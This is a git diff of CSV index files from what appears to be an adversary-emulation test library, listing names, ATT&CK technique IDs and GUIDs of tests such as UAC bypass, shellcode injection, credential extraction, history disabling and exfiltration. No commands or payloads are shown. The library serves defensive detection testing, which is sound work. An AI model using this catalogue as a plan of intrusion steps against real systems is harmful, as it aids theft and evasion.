+collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
+collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
+collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
+collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
+collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
+collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
+collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
+collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
defense-evasion,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
-defense-evasion,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
-defense-evasion,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
-defense-evasion,T1548.002,Bypass User Access Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
-defense-evasion,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
-defense-evasion,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
-defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
-defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
-defense-evasion,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
+defense-evasion,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
+defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
+defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
+defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -321,8 +357,6 @@ defense-evasion,T1070.004,File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f1
defense-evasion,T1070.004,File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
defense-evasion,T1070.004,File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
defense-evasion,T1553.001,Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
-defense-evasion,T1562.003,HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
-defense-evasion,T1562.003,HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1564.001,Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1564.001,Hidden Files and Directories,2,Mac Hidden file,cddb9098-3b47-4e01-9d3b-6f5f323288a9,sh
defense-evasion,T1564.001,Hidden Files and Directories,3,Create Windows System File with Attrib,f70974c8-c094-4574-b542-2c545af95a32,command_prompt
@@ -333,6 +367,8 @@ defense-evasion,T1564.001,Hidden Files and Directories,7,Show all hidden files,9
defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
+defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
+defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Indicator Blocking,2,Lgging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
@@ -407,7 +443,9 @@ defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf3
defense-evasion,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
defense-evasion,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
+defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
+defense-evasion,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
@@ -444,6 +482,8 @@ defense-evasion,T1218,Signed Binary Proxy Execution,2,SyncAppvPublishingServer -
defense-evasion,T1218,Signed Binary Proxy Execution,3,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,4,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt
+defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
+defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
defense-evasion,T1027.002,Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
@@ -657,12 +697,14 @@ execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86
execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
execution,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
+execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
+execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
@@ -717,36 +759,6 @@ command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-
command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
-collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
-collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
-collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
-collection,T1560.001,Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
-collection,T1560.001,Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
-collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
-collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
-collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
-collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
-collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
-collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
-collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
-collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
-collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
-collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
-collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
-collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
-collection,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
-collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
-collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
-collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
-collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
-collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
-collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
-collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
-collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
-collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
-collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
-collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
-collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index 5e0d0cf0..d5c4b268 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -41,6 +41,13 @@ credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-49
credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
+collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
+collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
+collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
+collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
+collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
+collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
+collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
@@ -62,9 +69,9 @@ defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562
defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
defense-evasion,T1070.004,File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
-defense-evasion,T1562.003,HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
-defense-evasion,T1562.003,HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1564.001,Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
+defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
+defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Indicator Blocking,2,Lgging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
@@ -144,13 +151,6 @@ command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-42
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
-collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
-collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
-collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
-collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
-collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
-collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
-collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv
index 099d86f8..e108fcdf 100644
--- a/atomics/Indexes/Indexes-CSV/macos-index.csv
+++ b/atomics/Indexes/Indexes-CSV/macos-index.csv
@@ -41,6 +41,24 @@ persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
+credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
+credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
+credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
+credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
+credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
+credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
+credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
+credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
+credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
+collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
+collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
+collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
+collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
+collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
+collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
+collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
+collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
+collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
@@ -58,8 +76,6 @@ defense-evasion,T1562.001,Disable or Modify Tools,9,Stop and unload Crowdstrike
defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1553.001,Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
-defense-evasion,T1562.003,HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
-defense-evasion,T1562.003,HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1564.001,Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1564.001,Hidden Files and Directories,2,Mac Hidden file,cddb9098-3b47-4e01-9d3b-6f5f323288a9,sh
defense-evasion,T1564.001,Hidden Files and Directories,5,Hidden files,3b7015f2-3144-4205-b799-b05580621379,sh
@@ -67,6 +83,8 @@ defense-evasion,T1564.001,Hidden Files and Directories,6,Hide a Directory,b115ec
defense-evasion,T1564.001,Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
+defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
+defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
@@ -143,25 +161,7 @@ command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
-collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
-collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
-collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
-collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
-collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
-collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
-collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
-collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
-collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
